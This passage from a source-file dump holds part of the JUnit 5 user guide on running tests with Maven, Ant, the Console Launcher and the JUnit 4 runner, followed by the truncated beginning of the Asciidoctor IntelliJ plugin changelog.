the\n`junit-platform-surefire-provider`.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<dependencies>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.platform<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-platform-surefire-provider<\/artifactId>\n\t\t\t\t\t\t<version>{platform-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-maven-engines-configure]]\n===== Configuring Test Engines\n\nIn order to have Maven Surefire run any tests at all, a `TestEngine` implementation must\nbe added to the runtime classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `test` dependency on the\nJUnit Jupiter API, and add the JUnit Jupiter `TestEngine` implementation to the\ndependencies of the `maven-surefire-plugin` similar to the 
following.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<dependencies>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.platform<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-platform-surefire-provider<\/artifactId>\n\t\t\t\t\t\t<version>{platform-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t\t\t\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t<artifactId>junit-jupiter-api<\/artifactId>\n\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t<\/dependencies>\n\t...\n----\n\nThe JUnit Platform Surefire Provider can run JUnit 4 based tests as long as you configure\na `test` dependency on JUnit 4 and add the JUnit Vintage `TestEngine` implementation to\nthe dependencies of the `maven-surefire-plugin` similar to the following.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<dependencies>\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.platform<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-platform-surefire-provider<\/artifactId>\n\t\t\t\t\t\t<version>{platform-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t\t...\n\t\t\t\t\t<dependency>\n\t\t\t\t\t\t<groupId>org.junit.vintage<\/groupId>\n\t\t\t\t\t\t<artifactId>junit-vintage-engine<\/artifactId>\n\t\t\t\t\t\t<version>{vintage-version}<\/version>\n\t\t\t\t\t<\/dependency>\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>junit<\/groupId>\n\t\t\t<artifactId>junit<\/artifactId>\n\t\t\t<version>{junit4-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t<\/dependencies>\n\t...\n----\n\n[[running-tests-build-maven-test-system-property]]\n===== Running a Single Test Class\n\nThe JUnit Platform Surefire Provider supports the `test` JVM system property supported by\nthe Maven Surefire Plugin. For example, to run only test methods in the\n`org.example.MyTest` test class you can execute `mvn -Dtest=org.example.MyTest test` from\nthe command line. For further details, consult the\nhttps:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/single-test.html[Maven Surefire Plugin]\ndocumentation.\n\n[[running-tests-build-maven-filter-test-class-names]]\n===== Filtering by Test Class Names\n\nThe Maven Surefire Plugin will scan for test classes whose fully qualified names match\nthe following patterns.\n\n- `+**\/Test*.java+`\n- `+**\/*Test.java+`\n- `+**\/*Tests.java+`\n- `+**\/*TestCase.java+`\n\nMoreover, it will exclude all nested classes (including static member classes) by default.\n\nNote, however, that you can override this default behavior by configuring explicit\n`include` and `exclude` rules in your `pom.xml` file. 
For example, to keep Maven Surefire\nfrom excluding static member classes, you can override its exclude rules.\n\n[source,xml,indent=0]\n[subs=attributes+]\n.Overriding exclude rules of Maven Surefire\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludes>\n\t\t\t\t\t\t<exclude\/>\n\t\t\t\t\t<\/excludes>\n\t\t\t\t<\/configuration>\n\t\t\t\t...\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\nPlease see the\nhttps:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/inclusion-exclusion.html[Inclusions and Exclusions of Tests]\ndocumentation for Maven Surefire for details.\n\n[[running-tests-build-maven-filter-tags]]\n===== Filtering by Tags\n\nYou can filter tests by tags or <<running-tests-tag-expressions, tag expressions>> using\nthe following configuration properties.\n\n- to include _tags_ or _tag expressions_, use either `groups` or `includeTags`.\n- to exclude _tags_ or _tag expressions_, use either `excludedGroups` or `excludeTags`.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t <properties>\n\t\t\t <includeTags>acceptance | !feature-a<\/includeTags>\n\t\t\t <excludeTags>integration, regression<\/excludeTags>\n\t\t\t <\/properties>\n\t\t\t <\/configuration>\n\t\t\t\t<dependencies>\n\t\t\t\t\t...\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-maven-config-params]]\n===== Configuration Parameters\n\nYou can set JUnit Platform <<running-tests-config-params, configuration parameters>> to\ninfluence test discovery and execution by declaring the `configurationParameters`\nproperty and providing key-value pairs using the Java `Properties` file syntax (as shown\nbelow) or via the `junit-platform.properties` file.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t...\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<properties>\n\t\t\t\t\t\t<configurationParameters>\n\t\t\t\t\t\t\tjunit.jupiter.conditions.deactivate = *\n\t\t\t\t\t\t\tjunit.jupiter.extensions.autodetection.enabled = true\n\t\t\t\t\t\t\tjunit.jupiter.testinstance.lifecycle.default = per_class\n\t\t\t\t\t\t<\/configurationParameters>\n\t\t\t\t\t<\/properties>\n\t\t\t\t<\/configuration>\n\t\t\t\t<dependencies>\n\t\t\t\t\t...\n\t\t\t\t<\/dependencies>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-ant]]\n==== Ant\n\nStarting with version `1.10.3` of link:https:\/\/ant.apache.org\/[Ant], a new\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher`] task has\nbeen introduced to provide native support for launching tests on the JUnit Platform. The\n`junitlauncher` task is solely responsible for launching the JUnit Platform and passing\nit the selected collection of tests. 
The JUnit Platform then delegates to registered test\nengines to discover and execute the tests.\n\nThe `junitlauncher` task attempts to align as close as possible with native Ant\nconstructs such as\nlink:https:\/\/ant.apache.org\/manual\/Types\/resources.html#collection[resource collections]\nfor allowing users to select the tests that they want executed by test engines. This\ngives the task a consistent and natural feel when compared to many other core Ant tasks.\n\nNOTE: The version of the `junitlauncher` task shipped in Ant 1.10.3 provides basic,\nminimal support for launching the JUnit Platform. Additional enhancements (including\nsupport for forking the tests in a separate JVM) will be available in subsequent releases\nof Ant.\n\nThe `build.xml` file in the `{junit5-jupiter-starter-ant}` project demonstrates how to use\nit and can serve as a starting point.\n\n===== Basic Usage\n\nThe following example demonstrates how to configure the `junitlauncher` task to select a\nsingle test class (i.e., `org.myapp.test.MyFirstJUnit5Test`).\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\n\t<!-- ... -->\n\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<test name=\"org.myapp.test.MyFirstJUnit5Test\" \/>\n\t<\/junitlauncher>\n----\n\nThe `test` element allows you to specify a single test class that you want to be selected\nand executed. The `classpath` element allows you to specify the classpath to be used to\nlaunch the JUnit Platform. This classpath will also be used to locate test classes that\nare part of the execution.\n\nThe following example demonstrates how to configure the `junitlauncher` task to select\ntest classes from multiple locations.\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\t....\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<testclasses outputdir=\"${output.dir}\">\n\t\t\t<fileset dir=\"${build.classes.dir}\">\n\t\t\t\t<include name=\"org\/example\/**\/demo\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t\t<fileset dir=\"${some.other.dir}\">\n\t\t\t\t<include name=\"org\/myapp\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t<\/testclasses>\n\t<\/junitlauncher>\n----\n\nIn the above example, the `testclasses` element allows you to select multiple test\nclasses that reside in different locations.\n\nFor further details on usage and configuration options please refer to the official Ant\ndocumentation for the\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher` task].\n\n[[running-tests-console-launcher]]\n=== Console Launcher\n\nThe `{ConsoleLauncher}` is a command-line Java application that lets you launch the JUnit\nPlatform from the console. For example, it can be used to run JUnit Vintage and JUnit\nJupiter tests and print test execution results to the console.\n\nAn executable `junit-platform-console-standalone-{platform-version}.jar` with all\ndependencies included is published in the central Maven repository under the\nhttps:\/\/repo1.maven.org\/maven2\/org\/junit\/platform\/junit-platform-console-standalone[junit-platform-console-standalone]\ndirectory. 
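\n\nIf you would like to fetch that jar locally first, the `dependency:get` goal of the Maven Dependency Plugin is one option; this sketch assumes Maven is installed and simply reuses the coordinates published under the directory above.\n\n[subs=attributes+]\n----\nmvn dependency:get -Dartifact=org.junit.platform:junit-platform-console-standalone:{platform-version}\n----\n\n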
You can https:\/\/docs.oracle.com\/javase\/tutorial\/deployment\/jar\/run.html[run] the\nstandalone `ConsoleLauncher` as shown below.\n\n`java -jar junit-platform-console-standalone-{platform-version}.jar <<<running-tests-console-launcher-options>>>`\n\nHere's an example of its output:\n\n....\n\u251c\u2500 JUnit Vintage\n\u2502 \u2514\u2500 example.JUnit4Tests\n\u2502 \u2514\u2500 standardJUnit4Test \u2714\n\u2514\u2500 JUnit Jupiter\n \u251c\u2500 StandardTests\n \u2502 \u251c\u2500 succeedingTest() \u2714\n \u2502 \u2514\u2500 skippedTest() \u21b7 for demonstration purposes\n \u2514\u2500 A special test case\n \u251c\u2500 Custom test name containing spaces \u2714\n \u251c\u2500 \u256f\u00b0\u25a1\u00b0\uff09\u256f \u2714\n \u2514\u2500 \ud83d\ude31 \u2714\n\nTest run finished after 64 ms\n[ 5 containers found ]\n[ 0 containers skipped ]\n[ 5 containers started ]\n[ 0 containers aborted ]\n[ 5 containers successful ]\n[ 0 containers failed ]\n[ 6 tests found ]\n[ 1 tests skipped ]\n[ 5 tests started ]\n[ 0 tests aborted ]\n[ 5 tests successful ]\n[ 0 tests failed ]\n....\n\n.Exit Code\nNOTE: The `{ConsoleLauncher}` exits with a status code of `1` if any containers or tests\nfailed. If no tests are discovered and the `--fail-if-no-tests` command-line option is\nsupplied, the `ConsoleLauncher` exits with a status code of `2`. Otherwise the exit code\nis `0`.\n\n[[running-tests-console-launcher-options]]\n==== Options\n\n----\ninclude::{consoleLauncherOptionsFile}[]\n----\n\n[[running-tests-console-launcher-argument-files]]\n==== Argument Files (@-files)\n\nOn some platforms you may run into system limitations on the length of a command line\nwhen creating a command line with lots of options or with long arguments.\n\nSince version 1.3, the `ConsoleLauncher` supports _argument files_, also known as\n_@-files_. Argument files are files that themselves contain arguments to be passed to the\ncommand. When the underlying https:\/\/github.com\/remkop\/picocli[picocli] command line\nparser encounters an argument beginning with the character `@`, it expands the contents\nof that file into the argument list.\n\nThe arguments within a file can be separated by spaces or newlines. If an argument\ncontains embedded whitespace, the whole argument should be wrapped in double or single\nquotes -- for example, `\"-f=My Files\/Stuff.java\"`.\n\nIf the argument file does not exist or cannot be read, the argument will be treated\nliterally and will not be removed. This will likely result in an \"unmatched argument\"\nerror message. You can troubleshoot such errors by executing the command with the\n`picocli.trace` system property set to `DEBUG`.\n\nMultiple _@-files_ may be specified on the command line. The specified path may be\nrelative to the current directory or absolute.\n\nYou can pass a real parameter with an initial `@` character by escaping it with an\nadditional `@` symbol. 
For example, `@@somearg` will become `@somearg` and will not be\nsubject to expansion.\n\n\n[[running-tests-junit-platform-runner]]\n=== Using JUnit 4 to run the JUnit Platform\n\nThe `JUnitPlatform` runner is a JUnit 4 based `Runner` which enables you to run any test\nwhose programming model is supported on the JUnit Platform in a JUnit 4 environment --\nfor example, a JUnit Jupiter test class.\n\nAnnotating a class with `@RunWith(JUnitPlatform.class)` allows it to be run with IDEs and\nbuild systems that support JUnit 4 but do not yet support the JUnit Platform directly.\n\nNOTE: Since the JUnit Platform has features that JUnit 4 does not have, the runner is\nonly able to support a subset of the JUnit Platform functionality, especially with regard\nto reporting (see <<running-tests-junit-platform-runner-technical-names>>). But for the\ntime being the `JUnitPlatform` runner is an easy way to get started.\n\n[[running-tests-junit-platform-runner-setup]]\n==== Setup\n\nYou need the following artifacts and their dependencies on the classpath. See\n<<dependency-metadata>> for details regarding group IDs, artifact IDs, and versions.\n\n===== Explicit Dependencies\n\n* `junit-platform-runner` in _test_ scope: location of the `JUnitPlatform` runner\n* `junit-{junit4-version}.jar` in _test_ scope: to run tests using JUnit 4\n* `junit-jupiter-api` in _test_ scope: API for writing tests using JUnit Jupiter, including `@Test`, etc.\n* `junit-jupiter-engine` in _test runtime_ scope: implementation of the `TestEngine` API for JUnit Jupiter\n\n===== Transitive Dependencies\n\n* `junit-platform-suite-api` in _test_ scope\n* `junit-platform-launcher` in _test_ scope\n* `junit-platform-engine` in _test_ scope\n* `junit-platform-commons` in _test_ scope\n* `opentest4j` in _test_ scope\n\n[[running-tests-junit-platform-runner-technical-names]]\n==== Display Names vs. Technical Names\n\nTo define a custom _display name_ for the class run via `@RunWith(JUnitPlatform.class)`\nsimply annotate the class with `@SuiteDisplayName` and provide a custom value.\n\nBy default, _display names_ will be used for test artifacts; however, when the\n`JUnitPlatform` runner is used to execute tests with a build tool such as Gradle or\nMaven, the generated test report often needs to include the _technical names_ of test\nartifacts \u2014 for example, fully qualified class names \u2014 instead of shorter display names\nlike the simple name of a test class or a custom display name containing special\ncharacters. To enable technical names for reporting purposes, simply declare the\n`@UseTechnicalNames` annotation alongside `@RunWith(JUnitPlatform.class)`.\n\nNote that the presence of `@UseTechnicalNames` overrides any custom display name\nconfigured via `@SuiteDisplayName`.\n\n[[running-tests-junit-platform-runner-single-test]]\n==== Single Test Class\n\nOne way to use the `JUnitPlatform` runner is to annotate a test class with\n`@RunWith(JUnitPlatform.class)` directly. Please note that the test methods in the\nfollowing example are annotated with `org.junit.jupiter.api.Test` (JUnit Jupiter), not\n`org.junit.Test` (JUnit Vintage). 
Moreover, in this case the test class must be `public`;\notherwise, some IDEs and build tools might not recognize it as a JUnit 4 test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4ClassDemo.java[tags=user_guide]\n----\n\n[[running-tests-junit-platform-runner-test-suite]]\n==== Test Suite\n\nIf you have multiple test classes you can create a test suite as can be seen in the\nfollowing example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4SuiteDemo.java[tags=user_guide]\n----\n\nThe `JUnit4SuiteDemo` will discover and run all tests in the `example` package\nand its subpackages. By default, it will only include test classes whose names\neither begin with `Test` or end with `Test` or `Tests`.\n\n.Additional Configuration Options\nNOTE: There are more configuration options for discovering and filtering tests than just\n`@SelectPackages`. Please consult the\n{javadoc-root}\/org\/junit\/platform\/suite\/api\/package-summary.html[Javadoc] for further\ndetails.\n\n[[running-tests-config-params]]\n=== Configuration Parameters\n\nIn addition to instructing the platform which test classes and test engines to include,\nwhich packages to scan, etc., it is sometimes necessary to provide additional custom\nconfiguration parameters that are specific to a particular test engine or registered\nextension. For example, the JUnit Jupiter `TestEngine` supports _configuration\nparameters_ for the following use cases.\n\n- <<writing-tests-test-instance-lifecycle-changing-default>>\n- <<extensions-registration-automatic-enabling>>\n- <<extensions-conditions-deactivation>>\n\n_Configuration Parameters_ are text-based key-value pairs that can be supplied to test\nengines running on the JUnit Platform via one of the following mechanisms.\n\n1. The `configurationParameter()` and `configurationParameters()` methods in the\n `LauncherDiscoveryRequestBuilder` which is used to build a request supplied to the\n <<launcher-api, `Launcher` API>>. When running tests via one of the tools provided\n by the JUnit Platform you can specify configuration parameters as follows:\n * <<running-tests-console-launcher,Console Launcher>>: use the `--config`\n command-line option.\n * <<running-tests-build-gradle-config-params,Gradle>>: use the\n `systemProperty` or `systemProperties` DSL.\n * <<running-tests-build-maven-config-params,Maven Surefire provider>>: use the\n `configurationParameters` property.\n2. JVM system properties.\n3. The JUnit Platform configuration file: a file named `junit-platform.properties` in the\n root of the class path that follows the syntax rules for a Java `Properties` file.\n\nNOTE: Configuration parameters are looked up in the exact order defined above.\nConsequently, configuration parameters supplied directly to the `Launcher` take\nprecedence over those supplied via system properties and the configuration file.\nSimilarly, configuration parameters supplied via system properties take precedence over\nthose supplied via the configuration file.\n\n[[running-tests-tag-expressions]]\n=== Tag Expressions\nTag expressions are boolean expressions with the operators `!`, `&` and `|`. In addition,\n`(` and `)` can be used to adjust for operator precedence.\n\n.Operators (in descending order of precedence)\n|===\n| Operator | Meaning | Associativity\n\n| `!` | not | right\n| `&` | and | left\n| `\\|` | or | left\n|===\n\nIf you are tagging your tests across multiple dimensions, tag expressions help you to\nselect which tests to execute. Tagging by test type (e.g. 
_micro_, _integration_,\n_end-to-end_) and feature (e.g. *foo*, *bar*, *baz*) the following tag expressions can be\nuseful.\n\n[%header,cols=\"40,60\"]\n|===\n| Tag Expression\n| Selection\n\n| +foo+\n| all tests for *foo*\n\n| +bar \\| baz+\n| all tests for *bar* plus all tests for *baz*\n\n| +bar & baz+\n| all tests for the intersection between *bar* and *baz*\n\n| +foo & !end-to-end+\n| all tests for *foo*, but not the _end-to-end_ tests\n\n| +(micro \\| integration) & (foo \\| baz)+\n| all _micro_ or _integration_ tests for *foo* or *baz*\n|===\n\n[[running-tests-capturing-output]]\n=== Capturing Standard Output\/Error\n\nSince version 1.3, the JUnit Platform provides opt-in support for capturing output\nprinted to `System.out` and `System.err`. To enable it, simply set the\n`junit.platform.output.capture.stdout` and\/or `junit.platform.output.capture.stderr`\n<<running-tests-config-params, configuration parameter>> to `true`. In addition, you may\nconfigure the maximum number of buffered bytes to be used per executed test or container\nusing `junit.platform.output.capture.maxBuffer`.\n\nIf enabled, the JUnit Platform captures the corresponding output and publishes it as a\nreport entry using the `stdout` or `stderr` keys to all registered\n`{TestExecutionListener}` instances immediately before reporting the test or container as\nfinished.\n\nPlease note that the captured output will only contain output emitted by the thread that\nwas used to execute a container or test. Any output by other threads will be omitted\nbecause particularly when\n<<writing-tests-parallel-execution, executing tests in parallel>> it would be impossible\nto attribute it to a specific test or container.\n\nWARNING: Capturing output is currently an _experimental_ feature. 
You're invited to give\nit a try and provide feedback to the JUnit team so they can improve and eventually\n<<api-evolution, promote>> this feature.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"14e2eb93b770f8ea5b63de4b44fa55662b8b01d6","subject":"updated changelog","message":"updated changelog\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= Asciidoctor IntelliJ Plugin Changelog\n\n== About\n\nThis document provides a high-level view of the changes introduced by release.\n\n[[releasenotes]]\n== Release notes\n\n=== 0.29.x (work in progress)\n\n- improve handling of emails and links in editor (#307)\n\n=== 0.28.25\n\n- security review for in-browser preview, adding mac to prevent browser to retrieve arbitrary file, hiding referrer from externally retrieved resources (#303)\n\n=== 0.28.24 (preview, available from Github releases)\n\n- support undo for paste-image and send out notifications to add files to VCS (#298)\n- fix rendering of images in flicker-free fast preview (#241)\n- prevent NPE when opening AsciiDoc documents or fragments in browser (#303)\n- inspection to convert Markdown-style horizontal rules to AsciiDoc-style horizontal rules (thanks to @bbrenne) (#272, #302)\n\n=== 0.28.23 (preview, available from Github releases)\n\n- Paste image from clipboard (thanks to @bbrenne) (#298, #300)\n\n=== 0.28.22\n\n- Wrong test name in gutter when running tests, BrowserUrlProvider eagerly works on all files (#301)\n\n=== 0.28.21\n\n- fixing autocomplete for link: when brackets already provided\n- avoid flickering Math preview by replacing contents in Preview via JavaScript (#241)\n\n=== 0.28.20\n\n- Linking to Wiki page if JavaFX initialization is stuck (#299)\n\n=== 0.28.19\n\n- prevent \"`Initializing...`\" message in preview of empty file\n\n=== 0.28.18 (preview, available from Github releases)\n\n- detecting a stuck JavaFX initialization (#299)\n\n=== 0.28.17 (preview, available from Github releases)\n\n- tuning state resetting for lexer (#289)\n\n=== 0.28.16 (preview, available from Github releases)\n\n- adding code style settings for reformat (#289)\n- rework inline macro for false positives (#275)\n- ifdef\/ifndef\/endif body references attributes in (#275)\n- reset formatting after a blank line (#289)\n- navigate to auto-generated IDs of sections\n\n=== 0.28.15 (preview, available from Github releases)\n\n- respect imagesdir when resolving image paths in source file (#275)\n- resolve attribute names in macro definition (#275)\n- auto-completion of files should include \"..\" (#253)\n\n=== 0.28.14 (preview, available from Github releases)\n\n- lexer and highlighting support blocks with unbalanced or no delimiters (#289)\n\n=== 0.28.13 (preview, available from Github releases)\n\n- lexer and highlighting support several new tokens (callouts, admonitions, markdown style listings, definition lists) (#289)\n- reformat supports break-after-end-of-sentence, but still experimental (#289)\n\n=== 0.28.12 (preview, available from Github releases)\n\n- rework zoom for touchpads (#295)\n- added setting to disable error\/warning highlighting in editor (#296)\n\n=== 0.28.11 (preview, available from Github releases)\n\n- inject absolute location of .asciidoctorconfig file (thanks to @rdmueller) (#280)\n- support for '.adoc' 
extension of .asciidoctorconfig file (thanks to @rdmueller) (#293, #294)\n- new table size selector using the mouse (thanks to @bbrenne) (#92, #290)\n- create tables from clipboard and converting CSV\/TSV format to AsciiDoc (thanks to @bbrenne) (#92, #290)\n- better zoom support for touchpads, adding min\/max zoom level (#295)\n\n=== 0.28.10 (preview, available from Github releases)\n\n- inlining and extracting of includes (#271)\n\n=== 0.28.9 (preview, available from Github releases)\n\n- experimental support reformatting of AsciiDoc sources, needs to be enabled in the settings (#289)\n- \"`Open in Browser`\" now opens the contents of the preview in the selected browser including rendered diagrams (#82)\n\n=== 0.28.8 (preview, available from Github releases)\n\n- investigating problem that parts of the UI are not refreshing (#288)\n\n=== 0.28.7\n\n- Save image context menu now showing up on macOS (thanks to @wimdeblauwe) (#283)\n\n=== 0.28.6\n\n- fixing NPE introduced when detecting potentially blurry preview (#284)\n\n=== 0.28.5 (preview, available from Github releases)\n\n- support zoom in preview window (thanks to @ianflett) (#199, #279)\n- save generated images from preview (thanks to @bbrenne) (#245, #278)\n\n=== 0.28.4 (preview, available from Github releases)\n\n- autocompletion for attributes and attribute references (`:attr:` and `\\{attr}`) (thanks to @bbrenne) (#277)\n- renaming and find-usage for attribute names (#243)\n- upgrade to AsciidoctorJ 2.1.0 and Asciidoctor 2.0.10\n- statement completion adds newline if at end of file (#276)\n- listing and other delimiters recognized at end of file (#276)\n\n=== 0.28.3\n\n- brace matching for attribute start\/end (`:attr:` and `\\{attr}`)\n- syntax highlighting for enumerations (`.`)\n- fixing \"`Edit Fragment...`\" for listings (#276)\n\n=== 0.28.2\n\n- fixed parsing for old-style headers (#274)\n\n=== 0.28.1 (preview, available from Github releases)\n\n- new automated release mechanism, also EAP plugin repository\n\n=== 0.26.20 (preview, available from Github releases)\n\n- link to Wiki how to fix blurry preview (#213)\n- monospace-bold preview now working (#193)\n\n=== 0.26.19 (preview, available from Github releases)\n\n- tuning parsing and documentation (#267)\n- new inspection to shorten page break (`<<<`) where possible\n- `\\link:file#id[]` now with navigation and autocomplete (thanks to @bbrenne) (#273)\n\n=== 0.26.18 (preview, available from Github releases)\n\n- resolve the last reference in structure view as this will be the file; the others are the subdirectories (#267)\n- refactoring or shortened descriptions; now in sync for structure view and breadcrumbs (#267)\n- allow browser to cache static content to avoid flickering (#267)\n- allow more block types, supporting nested blocks, parsing content within blocks (#267)\n- rework folding to show first significant line in block (#267)\n\n=== 0.26.17 (preview, available from Github releases)\n\n- support escaping with backslash (`\\`) in editor, avoiding highlighting\n- move to released markdown-to-asciidoc version 1.1 to use proper dependency management (#268)\n- support spell checking on more elements including quotes, examples and comments (#269)\n- fixing autocomplete for file names on `include::[]` within blocks\n\n=== 0.26.16 (preview, available from Github releases)\n\n- show includes and images in structure view, adding icon set for breadcrumbs and structure view, tuning contents (#267)\n\n=== 0.26.15\n\n- fixing equals check for disabled injected languages 
(#266)\n\n=== 0.26.14\n\n- fixing NullPointerException in settings processing (#266)\n- supporting pass-through inline content\n\n=== 0.26.13\n\n- update to asciidoctorj-diagram:1.5.18\n- breadcrumb support in editor\n\n=== 0.26.12 (preview, available from Github releases)\n\n- supporting blanks in block attributes (#255)\n\n=== 0.26.11 (preview, available from Github releases)\n\n- adding support for GRAPHVIZ_DOT environment variable (#261)\n- adding support for statement completion (ctrl-shift-enter) (#263)\n- language injection is now enabled by default and can be disabled for specific languages, and will be disabled when the block has an `include::[]` (#255)\n- includes are now parsed and highlighted inside code blocks (#255)\n\n=== 0.26.10 (preview, available from Github releases)\n\n- Experimental highlighting in code blocks (#255, #262)\n\n=== 0.26.9 (preview, available from Github releases)\n\n- upgrading gradle and JetBrains plugin; now use `gradlew runIde` to start the plugin in development mode\n- allow user to switch left\/right and upper\/lower in split view (#136)\n- add syntax highlighter to support `\\link:file[]` (thanks to @bbrenne) (#259)\n- add syntax highlighter to support attribute:value and {attribute reference} (thanks to @bbrenne) (#260)\n\n=== 0.26.8 (preview, available from Github releases)\n\n- default file encoding for JRuby now UTF-8 if set file encoding is not supported by JRuby (#174)\n\n=== 0.26.7\n\n- fixing error in tree structure; improving test capabilities for parsing (#174)\n\n=== 0.26.6 (preview, available from Github releases)\n\n- improved brace matcher\n- ensure that block IDs are part of next section when folding (#174)\n\n=== 0.26.5 (preview, available from Github releases)\n\n- decouple read action from event thread to avoid error from IDE (#204)\n- highlighting for lexical quotes\n- parsing referenced file from reference (#204)\n\n=== 0.26.4 (preview, available from Github releases)\n\n- Support for relative path links in preview (#256)\n\n=== 0.26.3 (preview, available from Github releases)\n\n- allow folding of sections and blocks (#174)\n\n=== 0.26.2 (preview, available from Github releases)\n\n- allow horizontal split view via settings (#136)\n\n=== 0.26.1 (preview, available from Github releases)\n\n- adding color settings for syntax highlighting (#254)\n\n=== 0.26.0 (preview, available from Github releases)\n\n- support for anchors, block ids and references including linking and refactoring (#252)\n\n=== 0.25.14\n\n- making linking of documents work for standard includes (#204)\n- improved formatting when blank lines are edited, also handling spaces at the end of a line (#248)\n\n=== 0.25.13\n\n- support partial parsing in lexer to avoid flipping formatting in IntelliJ (#248)\n\n=== 0.25.12 (preview, available from Github releases)\n\n- adding additional rules for constrained formatting (#248)\n\n=== 0.25.11\n\n- moving from jruby-complete to jruby dependency like AsciidoctorJ did for 2.0 (#250)\n\n=== 0.25.10 (preview, available from Github releases)\n\n- improved syntax highlighting for block IDs and references, suppressing message \"possible invalid reference\" (#249)\n- show error message why preview wasn't rendered in preview (#251)\n\n=== 0.25.9\n\n- adding quote handler (#242)\n- Tuning highlighting for mono and bullet lists (#244)\n- Activating brace highlighting for mono\/italic\/bold (#244)\n\n=== 0.25.8 (preview, available from Github releases)\n\n- Tuning highlighting italic\/bold\/mono, adding brace matcher in text 
